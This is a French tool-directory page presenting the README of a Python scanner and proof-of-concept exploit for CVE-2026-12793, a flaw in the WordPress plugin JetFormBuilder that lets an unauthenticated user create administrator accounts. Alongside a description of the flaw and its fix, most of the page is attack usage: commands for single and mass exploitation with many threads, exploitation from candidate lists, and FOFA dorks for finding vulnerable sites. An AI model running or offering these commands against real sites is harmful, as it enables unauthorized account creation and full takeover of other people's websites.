Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-12793 — Scanner et exploit PoC en Python pour CVE-2026-12793, une élévation de privilèges non authentifiée dans JetFormBuilder <=3.6.2 qui crée des comptes administrateur WordPress. | Kitploit
Outils/GitHubGitHub/murrez/cve-2026-12793
Escalade de PrivilègesReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationScripting et AutomatisationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
5119il y a 20 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
murrez/cve-2026-12793

CVE-2026-12793

Scanner et exploit PoC en Python pour CVE-2026-12793, une élévation de privilèges non authentifiée dans JetFormBuilder <=3.6.2 qui crée des comptes administrateur WordPress.

Voir le dépôt

CVE-2026-12793 — Élévation de privilèges non authentifiée dans JetFormBuilder

Scanner et exploit proof-of-concept pour CVE-2026-12793 dans le plugin WordPress JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock).

CVECVE-2026-12793
Pluginjetformbuilder
Affecté≤ 3.6.2
Corrigé dans3.6.2.1+
CVSS9.8 Critique
AuthNon authentifié
CWECWE-269 — Gestion inappropriée des privilèges
Chercheurdaroo (Wordfence)

Vulnérabilité

Le plugin ne vérifie pas que _jet_engine_booking_form_id fait référence à un custom post type jet-form-builder publié avant de charger le contenu de bloc du post référencé comme schéma de formulaire et d'exécuter les actions post-soumission.

Un attaquant non authentifié peut soumettre une requête AJAX forgée pour déclencher l'action Register User (wp_insert_user) et créer un nouveau compte WordPress. Si le formulaire cible est mal configuré avec un rôle élevé (par exemple administrator), cela conduit à une prise de contrôle complète du site.

Flux d'attaque

1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

Correctif (3.6.2.1)

  • Block_Helper::is_valid_form_post() — seul le CPT jet-form-builder publié est accepté
  • Form_Handler::set_form_id() rejette les ID de formulaire invalides
  • Durcissement de la validation SSR (wp_insert_user / wp_update_user bloqués comme callbacks)

Prérequis

  • Python 3.8+
  • requests
pip install requests urllib3

Utilisation

Cible unique — vérification

python poc.py -u https://target.example --mode check

Scan de masse

python poc.py --list domains.txt --mode check --threads 30 --quiet

Formats d'entrée : un domaine/URL par ligne, CSV FOFA (host,domain), ou candidates.jsonl d'une exécution précédente.

Exploit (cible unique)

python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

Exploit de masse depuis les candidats

python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

Options

FlagDescription
-u, --urlURL de la cible unique
--listFichier de liste des cibles
--modecheck (par défaut) ou exploit
--form-idID de post du formulaire JetFormBuilder connu
--page-urlPage intégrant le formulaire (referer), ex. /register/
--fieldsCorrespondance des champs : login=x,email=y,password=z
--pathsChemins supplémentaires à parcourir pour les formulaires
--username / --email / --passwordIdentifiants pour l'exploit (aléatoires si omis)
--verifyVérifier le compte via wp-login.php après soumission
-j, --threadsThreads de travail (par défaut : 20)
--timeoutDélai d'expiration HTTP en secondes (par défaut : 20)
--proxyURL du proxy HTTP(S)
--outputJournal JSONL complet (par défaut : cve_2026_12793_results.jsonl)
--vuln-listListe des cibles vulnérables (par défaut : hits.txt)
--candidates-listJSONL des candidats (par défaut : candidates.jsonl)
-q, --quietSortie de progression uniquement

Fichiers de sortie

FichierContenu
hits.txtURLs des cibles vulnérables / exploitées
candidates.jsonlCibles avec sonde Register User accessible (form_id, page_url, fields)
cve_2026_12793_results.jsonlRésultats JSON complets par cible

Exemple d'entrée candidate

{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

Les noms de champs auto-détectés sont heuristiques. Vérifiez toujours et remplacez-les avec --fields avant l'exploit.

Détection / dorks FOFA

body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

Vérification de version :

/wp-content/plugins/jetformbuilder/readme.txt

Recherchez Stable tag: ≤ 3.6.2.

Références

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

Avertissement

Cet outil est fourni à des fins de tests de sécurité autorisés et éducatives uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Les auteurs déclinent toute responsabilité en cas de mauvaise utilisation.

Licence

MIT

Télécharger l’outil